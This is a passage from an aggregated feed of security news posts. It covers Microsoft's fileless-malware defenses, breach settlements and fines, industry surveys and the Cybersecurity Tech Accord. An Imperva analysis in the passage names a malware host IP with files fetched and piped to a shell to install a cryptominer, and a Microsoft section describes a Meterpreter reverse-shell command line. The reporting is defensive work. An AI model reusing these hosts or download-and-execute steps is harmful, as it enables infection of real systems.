Instead of writing a generic detection algorithm based on the obfuscation patterns in the samples, we trained an ML model on this behavior log and wrote heuristic detection to catch the decrypted scripts inspected via AMSI. The results proved effective, catching new and unknown variants, protecting almost two thousand machines in a span of two months. Traditional detection would not have been as effective.

Nemucod.JAC attack campaigns caught via AMSIFigure 12. Nemucod.JAC attack campaigns caught via AMSI

Behavior monitoring

Windows Defender ATPs behavior monitoring engine provides an additional layer of antivirus protection against fileless malware. The behavior monitoring engine filters suspicious API calls. Detection algorithms can then match dynamic behaviors that use particular sequences of APIs with specific parameters and block processes that expose known malicious behaviors. Behavior monitoring is useful not only for fileless malware, but also for traditional malware where the same malicious code base gets continuously repacked, encrypted, or obfuscated. Behavior monitoring proved effective against WannaCry, which was distributed through the DoublePulsar backdoor and can be categorized as a very dangerous Type I fileless malware. While several variants of the WannaCry binaries were released in attack waves, the behavior of the ransomware remained the same, allowing antivirus capabilities in Windows Defender ATP to block new versions of the ransomware.

Behavior monitoring is particularly useful against fileless attacks that live off the land. The PowerShell reverse TCP payload from Meterpreter is an example: it can be run completely on a command line and can provide a PowerShell session to a remote attacker.

Example of a possible command line generated by MeterpreterFigure 13. Example of a possible command line generated by Meterpreter

Theres no file to scan in this attack, but through behavior monitoring in its antivirus capabilities, Windows Defender ATP can detect the creation of the PowerShell process with the particular command line required. Behavior monitoring detects and blocks numerous attacks like this on a daily basis.

Detections of the PowerShell reverse TCP payloadFigure 14. Detections of the PowerShell reverse TCP payload

Beyond looking at events by process, behavior monitoring in Windows Defender ATP can also aggregate events across multiple processes, even if they are sparsely connected via techniques like code injection from one process to another (i.e., not just parent-child processes). Moreover, it can persist and orchestrate sharing of security signals across Windows Defender ATP components (e.g., endpoint detection and response) and trigger protection through other parts of the layered defenses.

Behavior monitoring across multiple processes is not only an effective protection against fileless malware; its also a tool to catch attack techniques in generic ways. Here is another example where multi process behavior monitoring in action, Pyordono.A is a detection based on multi-process events and is aimed at blocking scripting engines (JavaScript, VBScript, Office macros) that try to execute cmd.exe or powershell.exe with suspicious parameters. Windows Defender ATP telemetry shows this detection algorithm protecting users from several campaigns.

Pyordono.A technique detected in the wildFigure 15. Pyordono.A technique detected in the wild

Recently, we saw a sudden increase in Pyordono.A encounters, reaching levels way above the average. We investigated this anomaly and uncovered a widespread campaign that used malicious Excel documents and targeted users in Italy from September 8 to 12.

Screenshot of malicious Excel document with instructions in Italian to click Enable contentFigure 16. Malicious Excel document with instructions in Italian to click Enable content

The document contains a malicious macro and uses social engineering to lure potential victims into running the malicious code. (Note: We have recently integrated Office 365 clients apps with AMSI, enabling antivirus solutions to scan macros at runtime to check for malicious content).

The obfuscated macro code attempts to run an obfuscated Cmd command which in turns executes an obfuscated Powershell script. In the end, the Ursnif trojan is delivered.Figure 17. The obfuscated macro code attempts to run an obfuscated Cmd command which in turns executes an obfuscated Powershell script. In the end, the Ursnif trojan is delivered.

The macro makes use of obfuscation to execute a cmd command, which is also obfuscated. The cmd command executes a PowerShell script that in turn downloads additional data and delivers the payload, infostealing Ursnif. We recently reported a small-scale Ursnif campaign that targeted small businesses in specific US cities. Through multi-process behavior monitoring, Windows Defender ATP detected and blocked the new campaign targeting users in Italy using a generic detection algorithm without prior knowledge of the malware.

Memory scanning

Antivirus capabilities in Windows Defender ATP also employ memory scanning to detect the presence of malicious code in the memory of a running process. Even if malware can run without the use of a physical file, it does need to reside in memory in order to operate and is therefore detectable by means of memory scanning. An example is the GandCrab ransomware, which was reported to have become fileless. The payload DLL is encoded in a string, then decoded and run dynamically via PowerShell. The DLL itself is never dropped on the disk. Using memory scanning, Windows Defender ATP can scan the memory of running processes and detect known patterns of the ransomware run from the stealthy DLL.

Memory scanning, in conjunction with behavior monitoring and other dynamic defenses, helped Windows Defender ATP to disrupt a massive Dofoil campaign. Dofoil, a known nasty downloader, uses some sophisticated techniques to evade detection, including process hollowing, which allows the malware to execute in the context of a legitimate process (e.g., explorer.exe). To this day, memory scanning detects Dofoil activities.

Detections of the memory-resident Dofoil payloadFigure 18. Detections of the memory-resident Dofoil payload

Memory scanning is a versatile tool: when suspicious APIs or behavior monitoring events are observed at runtime, antivirus capabilities in Windows Defender ATP trigger a memory scan in key points it is more likely to observe (and detect) a payload that has been decoded and may be about to run. This gives Windows Defender ATP granular control on which actions are more interesting and may require more attention. Every day, memory scanning allows Windows Defender ATP to protect thousands of machines against active high-profile threats like Mimikatz and WannaCry.

Boot Sector protection

With Controlled folder access on Windows 10, Windows Defender ATP does not allow write operations to the boot sector, thus closing a dangerous fileless attack vector used by Petya, BadRabbit, and bootkits in general. Boot infection techniques can be suitable for fileless threats because it can allow malware to reside outside of the file system and gain control of the machine before the operating system is loaded. The use of rootkit techniques, like in the defunct Alureon malware (also known as TDSS or TDL-4), can then render the malware invisible and extremely difficult to detect and remove. With Controlled folder access, which is part of Windows Defender ATPs attack surface reduction capabilities, this entire class of infection technique has become a thing of the past.

Control Folder Access preventing a boot sector infection attempted by PetyaFigure 19. Control Folder Access preventing a boot sector infection attempted by Petya

Windows 10 in S mode: Naturally resistant to fileless attacks

Windows 10 in S mode comes with a preconfigured set of restrictions and policies that make it naturally protected against a vast majority of the fileless techniques (and against malware in general). Among the available security features, the following ones are particularly effective against fileless threats:

For executables: Only Microsoft-verified applications from the Microsoft Store are allowed to run. Furthermore, Device Guard provides User Mode Code Integrity (UMCI) to prevent the loading of unsigned binaries.

For scripts: Scripting engines are not allowed to run (including JavaScript, VBScript, and PowerShell).

For macros: Office 365 does not allow the execution of macros in documents from the internet (for example, documents that are downloaded or received as attachment in emails from outside the organization).

For exploits: Exploit protection and Attack surface reduction rules are also available on Windows 10 in S mode as a consistent barrier against exploitation.

With these restrictions in place, Windows 10 in S mode devices are in a robust, locked down state, removing crucial attack vectors used by fileless malware.

Conclusion

As antivirus solutions become better and better at pinpointing malicious files, the natural evolution of malware is to shift to attack chains that use as few files as possible. While fileless techniques used to be employed almost exclusively in sophisticated cyberattacks, they are now becoming widespread in common malware, too.

At Microsoft, we actively monitor the security landscape to identify new threat trends and develop solutions that continuously enhance Windows security and mitigate classes of threats. We instrument durable generic detections that are effective against a wide range of threats. Through AMSI, behavior monitoring, memory scanning, and boot sector protection, we can inspect threats even with heavy obfuscation. Machine learning technologies in the cloud allow us to scale these protections against new and emerging threats.

Security solutions on Windows 10 integrate into a unified endpoint security platform in Windows Defender Advanced Threat Protection. Windows Defender ATP includes attack surface reduction, next-generation protection, endpoint protection and response, auto investigation and remediation, security posture, and advanced hunting capabilities. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free trial.

Protections against fileless and other threats are shared across Microsoft 365, which integrate technologies in Windows, Office 365, and Azure. Through the Microsoft Intelligent Security Graph, security signals are shared and remediation is orchestrated across Microsoft 365.

 

 

Andrea Lelli
Windows Defender Research

 

 

 

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV appeared first on Microsoft Secure.

Do You Suffer From Breach Optimism Bias?

If you’ve been in the information security field for at least a year, you’ve undoubtedly heard your organization defend the lack of investment in, change to or optimization of a cybersecurity policy, mitigating control or organizational belief. This “It hasn’t happened to us so it likely won’t happen” mentality is called optimism bias, and it’s an issue in our field that predates the field itself.

Read my full article over at Forbes.com.

Cybersecurity Researchers Spotted First-Ever UEFI Rootkit in the Wild

Cybersecurity researchers at ESET have unveiled what they claim to be the first-ever UEFI rootkit being used in the wild, allowing hackers to implant persistent malware on the targeted computers that could survive a complete hard-drive wipe. Dubbed LoJax, the UEFI rootkit is part of a malware campaign conducted by the infamous Sednit group, also known as APT28, Fancy Bear, Strontium, and

Uber Settles with 50 State Attorneys General for $148 Million In Connection with 2016 Data Breach

On September 26, 2018, Uber Technologies Inc. (“Uber”) agreed to a settlement (the “Settlement”) with all 50 U.S. state attorneys general (the “Attorneys General”) in connection with a 2016 data breach affecting the personal information (including driver’s license numbers) of approximately 607,000 Uber drivers nationwide, as well as approximately 57 million consumers’ email addresses and phone numbers. The Attorneys General alleged that after Uber learned of the breach, which occurred in November 2016, the company paid intruders a $100,000 ransom to delete the data. The Attorneys General alleged that Uber failed to promptly notify affected individuals of the incident, as required under various state laws, instead notifying affected customers and drivers of the breach one year later in November 2017. 

As reported by the Pennsylvania Office of the Attorney General, the Settlement will require Uber to pay $148 million to the Attorneys General, which will be divided among the 50 states. In addition, Uber must undertake certain data security measures, including:

  • comply with applicable breach notification and consumer protection laws regarding protecting personal information;
  • implement measures to protect user data stored on third-party platforms;
  • implement stricter internal password policies for employee access to Uber’s network;
  • develop and implement an overall data security policy to address the collection and protection of personal information, including assessing potential data security risks;
  • implement additional data security measures with respect to personal information stored on Uber’s network;
  • implement a corporate integrity program to ensure appropriate reporting channels for internal ethics concerns or complaints; and
  • engage a third-party expert to conduct regular assessments of Uber’s data security efforts and make recommendations for improvement, as appropriate.

The Settlement is pending court approval. In a statement, California Attorney General Xavier Becerra said, “Uber’s decision to cover up this breach was a blatant violation of the public’s trust. The company failed to safeguard user data and notify authorities when it was exposed. Consistent with its corporate culture at the time, Uber swept the breach under the rug in deliberate disregard of the law.”

We previously reported that the Federal Trade Commission modified a 2017 settlement with Uber after learning of the company’s response to the 2016 breach.

The state of network security in organizations with 1000+ employees

Security team size at the largest organizations does not scale with the number of overall employees, but they are more likely to include staff with specialized roles, say the results of the latest survey conducted by Osterman Research in partnership with ProtectWise. The similarities They interviewed 400 security analysts in the US to uncover the state of network security across organizations mid-size and large organizations, and have found that despite a number of differences, mid-sized … More

The post The state of network security in organizations with 1000+ employees appeared first on Help Net Security.

You should prepare for the next mega data breach

As of September 2018, it’s been one year since the historical Equifax mega data breach that impacted nearly half of all consumers in the U.S. Since this monumental invasion of personal data, fraudsters have shown little to no notion of slowing down as evident by the continued emergence of additional data breaches. In fact, within the past year alone, nearly 30 percent of U.S. consumers have been notified of a breach impacting their own personal … More

The post You should prepare for the next mega data breach appeared first on Help Net Security.

Downloads of known vulnerable open source components increase 120%

Sonatype today released its fourth annual State of the Software Supply Chain Report, which reveals the widespread use of vulnerable software components by businesses around the world. While open source continues to be a key driver of innovation – with software developers downloading more than 300 billion open source components in the past 12 months – hackers are exploiting this growing trend, and even beginning to inject vulnerabilities directly into open source projects. The findings … More

The post Downloads of known vulnerable open source components increase 120% appeared first on Help Net Security.

Most enterprises now running Windows 10, security hygiene no longer optional

Security is galvanizing around the move to Windows 10, the operating system that the majority of companies now run in their organizations, according to the 2018 Enterprise Endpoint Security Survey by Adaptiva. In the survey, over half of respondents indicated that security hygiene is a priority, listing security configuration management as an action that must be performed every day at a minimum. However, staffing remains a huge obstacle as less than half feel their organization … More

The post Most enterprises now running Windows 10, security hygiene no longer optional appeared first on Help Net Security.

The World’s Most Popular Coding Language Happens to be Most Hackers’ Weapon of Choice

Python will soon be the world’s most prevalent coding language.

That’s quite a statement, but if you look at its simplicity, flexibility and the relative ease with which folks pick it up, it’s not hard to see why The Economist recently touted it as the soon-to-be most used language, globally. Naturally, our threat research team had to poke around and see how popular Python is among bad actors.

And the best place to do that, well, Github, of course. Roughly estimating, more than 20% of GitHub repositories that implement an attack tool / exploit PoC are written in Python. In virtually every security-related topic in GitHub, the majority of the repositories are written in Python, including tools such as w3af , Sqlmap, and even the infamous AutoSploit tool.

At Imperva, we use an advanced intelligent Client Classification mechanism that distinguishes and classifies various web clients. When we take a look at our data, specifically security incidents, the majority of the clients (>25%) we identify — excluding vulnerability scanners — are based on Python.

Unlike other clients, in Python, we see a host of different attack vectors and the usage of known exploits. Hackers, like developers, enjoy Python’s advantages which makes it a popular hacking tool.

Figure 1: Security incidents by client, excluding vulnerability scanners. More than 25% of the clients were Python-based tools used by malicious actors, making it the most common vector for launching exploit attempts.

When examining the use of Python in attacks against sites we protect, the result was unsurprising – a large chunk, up to 77%, of the sites were attacked by a Python-based tool, and in over a third of the cases a Python-based tool was responsible for the majority of daily attacks. These levels, over time, show that Python-based tools are used for both breadth and depth scanning.  

Figure 2: Daily percentage of sites suffering Python-based attacks

Python Modules

The two most popular Python modules used for web attacks are Urllib and Python Requests. The chart below shows attack distribution.  Use of the new module, Async IO, is just kicking off, which makes perfect sense when you consider the vast possibilities the library offers in the field of layer 7 DDoS; especially when using a “Spray N’ Pray” technique:

Python and Known Exploits

The advantages of Python as a coding language make it a popular tool for implementing known exploits. We collected information on the top 10 vulnerabilities recently used by a Python-based tool, and we don’t expect it to stop.

The two most popular attacks in the last 2 months used CVE-2017-9841 – a PHP based Remote Code Execution (RCE) vulnerability in the PHPUnit framework, and CVE-2015-8562 which is a RCE against the Joomla! Framework. It isn’t surprising that the most common attacks had RCE potential, considering how valuable it is to malicious actors.

Another example, which isn’t in the top 10, is CVE-2018-1000207, which had hundreds of attacks each day for several days during the last week of August 2018. Deeper analysis shows that the attack was carried out on multiple protected customers, by a group of IPs from China.

CVEs over time

You can see that the number of CVEs which are being used by attackers, according to our data, has increased in the last few years:

In addition, Python is used to target specific applications and frameworks – below you can find the top 10, according to our data:

When we looked at all the frameworks targeted by Python, the attacks that stand out are those aimed at Struts, WordPress, Joomla and Drupal, which is not surprising as these are currently some of the most popular frameworks out there.

Attack vectors

The most popular HTTP parameter value we’ve seen used in attacks, responsible for around 30% of all different param values used, belongs to a backdoor upload attempt through a PHP Unserialize vulnerability in Joomla! using the JDatabaseDriverMysqli object. The backdoor uploaded payload is hosted on ICG-AuthExploiterBot.

We’ve also seen a recurring payload that turned out to be a Coinbitminer infection attempt, more details on that are in the appendix — note, the appendix is only meant as an example. Since Python is so widely used by hackers, there is a host of different attack vectors to take into consideration. Python requires minimal coding skills, making it easy to write a script and exploit a vulnerability.

Our recommendation

Unless you can differentiate between requests from Python-based tools and any other tool, our recommendations stay the same – make sure to keep security in mind when developing, keep your system up to date with patches, and refrain from any practice that is considered insecure.

Appendix – Example of an Attack

Here’s an interesting, recurring payload we’ve observed (with a small variance at the end):

After base64 decoding it, we get a binary payload:

In the above payload, there is a mention of a GitHub repository for a deserialization exploitation tool and a wget command download in a jpg file, which strongly suggests there is malicious activity. After downloading the file from http://45.227.252.250/jre.jpg we can see that it’s actually a script containing the following:

The two last lines in the script try to get http://45.227.252.250/static/font.jpg%7Cshwhich is identified as Trojan. Coinbitminer by Symantec Endpoint Protection.

This finding relates to a tweet from the end of August 2018, talking about a new Apache Struts vulnerability CVE-2018-11776 used to infect with the same Coinbitminer.

New tactics subvert traditional security measures and strike organizations of all sizes

Alert Logic released its latest cybersecurity analysis, “Critical Watch Report: The State of Threat Detection 2018,” which shows attackers are gaining vastly greater scale through new techniques such as killchain compression and attack automation, expanding the range of organizations under constant attack regardless of industry or size. To prepare the cybersecurity report, Alert Logic Security Operations and Threat Intelligence team members analyzed data from more than 1.2 billion anomalies, 7.2 million security events, and 250,000 … More

The post New tactics subvert traditional security measures and strike organizations of all sizes appeared first on Help Net Security.

Full compliance with the PCI DSS drops for the first time in six years

After documenting improvements in Payment Card Industry Data Security Standard (PCI DSS) compliance over the past six years (2010 – 2016), Verizon’s 2018 Payment Security Report (PSR) now reveals a concerning downward trend with companies failing compliance assessments and perhaps, more importantly, not maintaining – full compliance. Full compliance at interim assessment by year The PCI DSS helps businesses that offer card payment facilities protect their payment systems from breaches and theft of cardholder data. … More

The post Full compliance with the PCI DSS drops for the first time in six years appeared first on Help Net Security.

Poor security behavior still evident in most industry sectors

Security behaviors are poor across most industry sectors in Europe and the Unites States regardless of the employees attitudes towards security. In the largest study on security culture to date, the Norwegian software company CLTRe AS reveals data from more than 20,000 employees, across seven languages. Security Culture Report 2018 key findings Poor security behavior is evident in most industry sectors The Real estate sector is consistently worse in cybersecurity culture than any other sector … More

The post Poor security behavior still evident in most industry sectors appeared first on Help Net Security.

Panda Security has signed the Cybersecurity Tech Accord

Panda Security signs the Cybersecurity Tech Accord
The Spanish multinational is joining a key accord among a group of leading companies from around the world in the interest of defending equitable, global cybersecurity, an accord that over 60 leading technology and security companies have already joined.

Protecting our digital world is in the interest of everyone. With this in mind, Panda Security announces that it is joining the Cybersecurity Tech Accord and its public commitment to act responsibly, protect, and empower users and clients, and in this way improve the security, stability, and the resilience of cyberspace.

Three months after the announcement of the creation of the Cybersecurity Tech Accord, there are already 61 companies from all over the world that have joined in order to defend users against malicious attacks. Panda Security is among the renowned organizations who have joined in the last few hours, along with Aliter, Anomali, Balasys, Billennium, Cognizant, Cyber Services, Hitachi, Imperva, Integrity Partners, Panasonic, Predica, Rockwell Automation, Safetica, SecuCloud, Swisscom and Telelink. All of them join an expanding community of like-minded companies that aim to improve the resilience of cyberspace against malicious activities, and that, as a group, reaffirm their commitment to empowering users, developers, and clients so that they can better protect themselves.

Called for by Microsoft, the accord establishes a scope for collaboration, and creates mechanisms for the periodic exchange of information related to incidents or other important aspects related to cybersecurity; it calls for the sharing of methodologies to improve IT security; sharing of knowledge in this area, and support for the training and education of users, professionals, and companies in this area.

“The main commitment of Panda Security is to allowing people and organizations to enjoy technology safely, and without risks. Safeguarding our clients’ digital lives using high performance, secure, efficient systems, that are capable of fighting any kind of threat,” states Juan Santamaría, Panda Security’s CEO. “Cybersecurity is a challenge that we must face in a coordinated way, and it is precisely for this reason that we have made official our commitment via this collaboration agreement,” he adds.

As well as a first rate relationship and coordination among the signatories, the Cybersecurity Tech Accord works to defend and promote digital technologies in society, to supervise important aspects of the world’s communications infrastructure, including cloud based client relationships, collaboration tools, and endpoint, data center, and encryption security. The principals of protection for everyone.

Every company that is a signatory of the Cybersecurity Tech Accord is committed to four areas:

Greater defense against cyberattacks

As part of this, recognizing that everyone deserves protection, the participants commit to protect all clients all over the world, independently of the motivation for the online attacks.

Protecting citizens and companies

The companies will not help governments to launch cyberattacks against innocent citizens or businesses, and will protect them against tampering with and exploitation of technology products and services during their development, design, distribution and use.

A scene of collaboration

The companies will do more to empower developers and the people and companies that use their technology, helping them to improve their capacity to protect themselves. This can include working together on new security practices and new features that the companies can implement in their individual products and services.

Collective action

The companies will build on existing relationships, and will establish formal and informal partnerships with industry, civil society, and security researchers, across proprietary and open source technologies to improve technical collaboration, coordinated vulnerability disclosure, and threat sharing, as well as to minimize the levels of malicious code being introduced into cyberspace.

Proof of this firm commitment to collective action can be seen in the recent support of MANRS, an association whose aim is to guarantee secure and resilient Internet access via the protection of routing infrastructure. Or the recent association with the Global Forum on Cyber Expertise a global platform for countries, international organizations and private companies to exchange best practices and expertise on cyber capacity building, while maintaining the values of a free, open and secure Internet.

The accord is open to considering new signatories, who must be previously approved by the other members of the accord, independently of the sector the company is from or its size, who are trusted and already have high cybersecurity standards and who adhere to the principals of the accord.

Efforts aimed at protecting users independently of where they are from, or their geopolitical situation.

The post Panda Security has signed the Cybersecurity Tech Accord appeared first on Panda Security Mediacenter.

Why security products should be more actionable for users

As an active angel investor in companies that want to bring new security technology into the market, Azi Cohen is most likely to be persuaded to invest by three things: an endorsement from an external CISO, a clear go-to-market plan, and a team that knows how to sell security solutions. He also believes that all security companies – whether they are just starting or are already entrenched – should strive to make their products more … More

The post Why security products should be more actionable for users appeared first on Help Net Security.

Are you ready? A good incident response plan can protect your organization

The rise in cyber threats in the last several years has shown that organizations must continuously stay ahead of adversaries to protect their investments: data, intellectual property, finances, and people. Indeed, the Cisco 2018 Annual Cybersecurity Report found that the cost of attacks is no longer hypothetical. More than half of all breaches resulted in financial damages of more than $500,000. Over the years, I’ve designed incident response teams from the ground up as well … More

The post Are you ready? A good incident response plan can protect your organization appeared first on Help Net Security.

BlockState Interview Part One: Institutional Investment Framework Story

The mainstream media narrative has shown an uncompromisingly negative bias towards institutional crypto investment of late and it only seemed fair that we got in touch with some people who have professional expertise in the field. BlockState is a platform that aims to deliver a modular blockchain-based legal and technological infrastructure for financial institutions which […]

The post BlockState Interview Part One: Institutional Investment Framework Story appeared first on Hacked: Hacking Finance.

Imperva Joins Global Cybersecurity Tech Accord

Imperva is dedicated to the global fight to keep people’s data and applications safe from cybercriminals. What this means for our Imperva Threat Research team is that we spend a lot of time researching new cyber attacks, creating mitigations and writing powerful software. We believe that nothing grows in a vacuum, and as such understand the importance of collaboration as a member of the global cybersecurity ecosystem.

To this end, when we heard about the Cybersecurity Tech Accord, we knew it provided a unique opportunity for us to not only continue protecting our customers but to help make “cyberspace” safer for everyone. We’ve committed to working hand-in-hand with 61 other global companies, in doing so improving the security, stability, and resilience of cyberspace.

About the Cybersecurity Tech Accord

The Cybersecurity Tech Accord is a public commitment among 61 global companies to protect and empower the global online community and to improve the security, stability, and resilience of cyberspace.

Our Tech Accord commitment:

  • We will protect all of our users and customers everywhere. For us at Imperva, that’s part of our DNA. That means prioritizing security, integrity, and reliability of our software, to decrease the likelihood, frequency, exploitability, and severity of vulnerabilities.
  • We will oppose cyberattacks on innocent citizens and enterprises from anywhere. That means that we will not help governments launch cyber attacks on innocent citizens and enterprises from anywhere.

    It also means that we will protect against tampering with and exploitation of technology products and services during their development, design, distribution, and use.
  • We will help empower users, customers and developers to strengthen cybersecurity protection. That means we will provide our users, customers and the wider developer ecosystem with information and tools that enable them to understand current and future threats and protect themselves against them.

    It also means that we will support civil society, governments, and international organizations in their efforts to advance security in cyberspace and to build cybersecurity capacity in developed and emerging economies alike.
  • We will partner with each other and with like-minded groups to enhance cybersecurity. We feel like this is the heart of the Cybersecurity collaboration, the commitment to first fight cyber-crime and cyber-terrorism, only then be business rivals.

    It means we will work with each other and will establish formal and informal partnerships with industry, civil society, and security researchers, across proprietary and open source technologies, to improve technical collaboration, coordinated vulnerability disclosure, and threat sharing, as well as to minimize the levels of malicious code being introduced into cyberspace.

    It also means we will encourage global information sharing and civilian efforts to identify, prevent, detect, respond to, and recover from cyber attacks and ensure flexible responses to the security of the wider global technology ecosystem.

We are excited about being a part of the Cybersecurity Tech Accord and look forward to collaborating with fellow members.

One of our first collaborations will be a webinar for the Global Forum on Security Expertise (GFSE).

About the Global Forum on Cyber Expertise (GFCE)

The Global Forum on Cyber Expertise (GFCE) is a global platform for countries, international organizations and private companies to exchange best practices and expertise on cyber capacity building. The aim is to identify successful policies, practices, and ideas and multiply these on a global level. Together with partners from NGOs, the tech community and academia GFCE members develop practical initiatives to build cyber capacity.

Our webinar with the GFCE will be on application security. As you can imagine, this is a topic we are very passionate about – so we hope you’ll join us.

UK ICO Fines Equifax for 2017 Breach

Recently, the UK Information Commissioner’s Office (“ICO”) fined credit rating agency Equifax £500,000 for failing to protect the personal data of up to 15 million UK individuals. The data was compromised during a cyber attack that occurred between May 13 and July 30, 2017, which affected 146 million customers globally. Although Equifax’s systems in the U.S. were targeted, the ICO found the credit agency’s UK arm, Equifax Ltd, failed to take appropriate steps to ensure that its parent firm, which processed this data on its behalf, had protected the information. The ICO investigation uncovered a number of serious contraventions of the UK Data Protection Act 1998 (the “DPA”), resulting in the ICO imposing on Equifax Ltd the maximum fine available.

The compromised UK data was controlled by Equifax Ltd and was processed by Equifax Ltd’s parent company and data processor, Equifax Inc. The breach affected Equifax’s Identity Verifer (“EIV”) dataset, which related to the EIV product, and its GCS dataset. The compromised data included names, telephone numbers, driver’s licence numbers, financial details, dates of birth, security questions and answers (in plain text), passwords (in plain text) and credit card numbers (obscured). The ICO investigation found that there had been breaches of five of the eight data protection principles of the DPA. In particular, the ICO commented in detail on Equifax’s breaches of the fifth and seventh principles and noted the following:

  • Personal data processed for any purpose or purposes shall not be kept for longer than is necessary for that purpose or those purposes (Fifth Principle):
    • In 2016, Equifax Ltd moved the EIV product from the U.S. to be hosted in the UK. Once the EIV product had been migrated to the UK, it was no longer necessary to keep any of the EIV dataset, in particular the compromised UK data, on Equifax Inc.’s systems. The EIV dataset, however, was not deleted from Equifax’s U.S. systems and was subsequently compromised.
    • With respect to the GCS datasets stored on the U.S. system, Equifax Ltd was not sufficiently aware of the purpose(s) for which it was being processed until after the breach. In the absence of a lawful basis for processing (in breach of the First Principle of the DPA), the personal data should have been deleted. The data was not deleted and Equifax Ltd failed to follow-up or check that all UK data had been removed from Equifax’s U.S. systems.
  • Appropriate technical and organizational measures shall be taken against unauthorized or unlawful processing of personal data and against accidental loss or destruction of, or damage to, personal data (Seventh Principle):
    • Equifax Ltd failed to undertake an adequate risk assessment of the security arrangements that Equifax Inc. had in place, prior to transferring data to Equifax Inc. or following the transfer.
    • Equifax Ltd and Equifax Inc. had various data processing agreements in place, however, these agreements failed to (1) provide appropriate safeguards (not limited to security requirements), and (2) properly incorporate the EU Standard Contractual Clauses (in breach of the Eighth Principle of the DPA).
    • Equifax Ltd had a clear contractual right to audit Equifax Inc.’s compliance with its obligations under the aforementioned data processing agreements. Despite this right, Equifax Ltd failed to exercise it to check Equifax Inc.’s compliance with its obligations.
    • Communication procedures between Equifax Ltd and Equifax Inc. were deemed inadequate. In particular, this was highlighted by the delay of over one month between Equifax Inc. becoming aware of the breach and Equifax Ltd being informed of it.
    • Equifax Ltd failed to ensure adequate security measures were in place or notice that Equifax Inc. had failed to take such measures, including:
      • failing to adequately encrypt personal data or protect user passwords. The ICO did not accept Equifax Ltd’s reasons (i.e., fraud prevention and password analysis) for storing passwords in a plaintext file, particularly as it was a direct breach of Equifax Ltd’s own Cryptology Standards, and the stated aims could be achieved by other more secure means;
      • failing to address known IT vulnerabilities, including those identified and reported to senior employees. In particular, Equifax had been warned about a critical vulnerability in its systems by the U.S. Department of Homeland Security in March 2017. This vulnerability was given a score of 10.0 on the Common Vulnerability Scoring System (“CVSS”). A CVSS score of 10.0 is the highest score, indicating a critical vulnerability that requires immediate attention. Equifax Inc. failed to patch all vulnerable systems and this vulnerability in its consumer-facing disputes portal was exploited by the cyber attack; and
      • not having fully up-to-date software, failing to undertake sufficient and regular system scans, and failing to ensure appropriate network segregation (some UK data was stored together with U.S. data, making it difficult to differentiate).

Since the breach occurred prior to May 25, 2018, it was dealt with in accordance the Act. While the Equifax fine represents the maximum available under the Act, the aggravating factors identified by the ICO including the number of affected data subjects, the type of data at risk, and the multiple, systematic and serious inadequacies, it is likely that this fine would have been considerably more had the EU General Data Protection Regulation been in force when the breach occurred.

Delivering security innovation that puts Microsoft’s experience to work for you

Cybersecurity is the central challenge of our digital age. Without it, everything from our personal email accounts and privacy to the way we do business, and all types of critical infrastructure, are under threat. As attackers evolve, staying ahead of these threats is getting harder.

Microsoft can help. We focus on three areas: running security operations that work for you, building enterprise-class technology, and driving partnerships for a heterogeneous world. We can tip the scales in favor of the good guys and make the world a safer place.

Security operations that work for you

Every day, we practice security operations at a global scale to protect our customers, in the process analyzing more than 6.5 trillion signals. This is the most recent chapter in a journey down the experience curve that we have been on for more than a decade. Beginning with securing the operating system platform, our Microsoft Threat Intelligence Center (MSTIC) learned to build multi-dimensional telemetry to support security use cases, and to spot that rogue exploit in a distant crash dump bucket. Today, more than 3,500 full-time security professionals work to secure datacenters, run our Cyber Defense Operations Center, hack our own defenses, and hunt down attackers. We block more than 5 billion distinct malware threats per month. Just one recent example shows the power of the cloud. Microsofts cloud-based machine learning models detected a stealthy and highly targeted attack on small businesses across the U.S. with only 200 discrete targets called Ursnif and neutralized the threat. We surface this operational experience and the insights we derived in the security technology we build.

Building enterprise-class technology

It is the cloud that enables us to take all this signal, intelligence, and operational experience and use it to help our customers be more secure, with enterprise-class security technology. For example, we use the insights from processing hundreds of billions of authentications to cloud services a month to deliver risk-based conditional access for customers in Azure Active Directory (AD).

The end of the password era

We are not only protecting the Microsoft platform though. Our security helps protect hundreds of thousands of line-of-business and SaaS apps as they connect to Azure AD. We are delivering new support for password-less sign-in to Azure AD-connected apps via Microsoft Authenticator. The Authenticator app replaces your password with a more secure multi-factor sign-in that combines your phone and your fingerprint, face, or PIN. Using a multi-factor sign-in method, you can reduce compromise by 99.9 percent, and you can make the user experience simpler by eliminating passwords. No company lets enterprises eliminate more passwords than Microsoft. Today, we are declaring an end to the era of passwords.

Improving your security posture with a report card

Microsoft Secure Score is the only enterprise-class dynamic report card for cybersecurity. By using it, organizations get assessments and recommendations that typically reduce their chance of a breach by 30-fold. It guides you to take steps like securing admin accounts with Multi-Factor Authentication (MFA), securing user accounts with MFA, and turning off client-side email forwarding rules. Starting today, were expanding Secure Score to cover all of Microsoft 365. We are also introducing Secure Score for your hybrid cloud workloads in the Azure Security Center, so you have full visibility across your estate.

Putting cloud intelligence in your hands with Microsoft Threat Protection

By connecting our cloud intelligence to our threat protection solutions, we can stem a mass outbreak or find a needle in a haystack. A recent highly localized malware campaign, for example, targeted just under 200 home users and small businesses in a few U.S. cities. It was designed to fly under the radar, but Windows Defenders cloud-based machine learning models detected the malicious behavior and stopped it cold.

To help security operations professionals benefit from our experience, we created a community where our researchers and others from the industry can share advanced queries to hunt attackers and new threats, giving us all more insight and better protection.

Today, were announcing Microsoft Threat Protection, an integrated experience for detection, investigation, and remediation across endpoints, email, documents, identity, and infrastructure in the Microsoft 365 admin console. This will let analysts save thousands of hours as they automate the more mundane security tasks.

Protecting data wherever it goes

Cloud workloads are often targeted by cybercriminals because they operate on some of the most sensitive data an organization has. We made Azure the first cloud platform to offer confidentiality and integrity of data while in useadding to the protections already in place to encrypt data in transit and at rest. Azure confidential computing benefits will be available soon on a new DC series of virtual machines in Azure, enabling trusted execution environments using Intel SGX chipsets to protect data while it is computed on.

